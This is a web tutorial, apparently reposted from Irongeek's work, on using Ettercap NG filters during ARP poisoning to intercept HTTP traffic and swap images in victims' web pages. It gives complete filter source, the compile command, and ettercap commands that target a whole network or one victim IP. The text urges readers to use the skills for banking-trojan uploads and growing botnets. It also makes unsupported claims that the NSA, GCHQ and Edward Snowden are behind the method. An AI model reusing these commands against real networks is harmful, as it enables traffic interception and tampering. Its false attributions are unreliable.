Ettercap NG is a MiTM tool for intercepting and modifying traffic

Ettercap NG can be extended by using filters and plug-ins, making it able to do all sorts of neat network tasks. Using filters is what the NSA and GCQH do with Ettercap NG. The easiest way to use Ettercap NG is on Windows XP machine. The NSA and GCHQ prefer to use the Ettercap NG-0.7.3.

In this case Edward Snowden show you how to compromise some host and have the images in web pages replaced by the Jolly Rogers.

Please feel free to use the skills learned from this paper to do many other useful tasks like on-line banking trojan uploads and botnet enlagement. The first thing you need to do is create an Ettercap NG filter. The sample source code below:

############################################################################
#                                                                          #
#  Jolly Pwned -- ig.filter -- filter source file                          #
#                                                                          #
#  By Irongeek. based on code from ALoR & NaGA                             #
#  Along with some help from Kev and jon.dmml                              #
#  http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833              #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
############################################################################
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); 
   # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src="http://www.irongeek.com/images/jollypwn.png" ");
   replace("IMG SRC=", "img src="http://www.irongeek.com/images/jollypwn.png" ");
   msg("Filter Ran.n");

}

The code should be pretty self explanatory to anyone who has done much coding before (it’s very much like C and other languages). The # symbols are comments. The «if» statement tells the filter to only work on TCP packet from source port 80, in other words coming from a web server. This test may still miss some images, but should get most of them. I’m also not sure about Ettercap’s order of operation with AND (&&) and OR (||) statements but this filter largely seems to work (I tried using parentheses to explicitly specify the order of operation with the Boolean operators but this gave me compile errors).  The «replace» function replaces the first parameter string with the second.  Because of the way this string replacement works it will try to mangled image tags and insert the picture you desire into the web page’s HTML before it returns it to the victim. The tags may end up looking something like the following:

<img src=»http://www.irongeek.com/images/jollypwn.png» /images/original-image.jpg>

The original image location will still be in the tag, but most web browsers should see it as a useless parameter. The «msg» function just prints to the screen letting us know that the filter has fired off.

Now that you sort of understand the basics of the filter lets compile it. Take the ig.filter source code listed above and paste it into a text file, then compile the filter into a .ef file using the following command:

        etterfilter ig.filter -o ig.ef

As soon as filter is compiled you need to target the hosts you want to ARP poison and run the filter on:

 So, if you wanted to target all hosts on the network you would use the following command:  

    ettercap -T -q -F ig.ef -M ARP // //

Be careful with the above command, having all of the traffic on a large network going though one slow computer can really bog down network connections. If you had a specific victim in mind, let’s say a host with the IP 192.168.22.47, you would use this command:

 ettercap -T -q -F ig.ef -M ARP /192.168.22.47/ //

Here are what the command line option flags do:

-T tells Ettercap to use the text interface, I like this option the best as the more GUI modes are rather confusing.
-q tells Ettercap to be more quiet, in other words less verbose.
-F tells Ettercap to use a filter, in this case ig.ef that you compiled earlier.
-M tells Ettercap the MITM (Man in the Middle) method you want to use, in this case ARP poisoning.

Once Ettercap NG is running you would get some output something like the following:

Below you can see what the Antionline and Binrev web pages look like when the victim tries to view them after Ettercap NG filtering:

This filter does not seem to fire off for all images, it’s a little hit and miss. For more information on things you can do Ettercap NG filters look at the sample code in the file «etter.filter.examples» that comes along with Ettercap NG. On my box this file is located in /usr/share/ettercap/etter.filter.examples. Also check out Kev’s tutorial on Ettercap NG filters.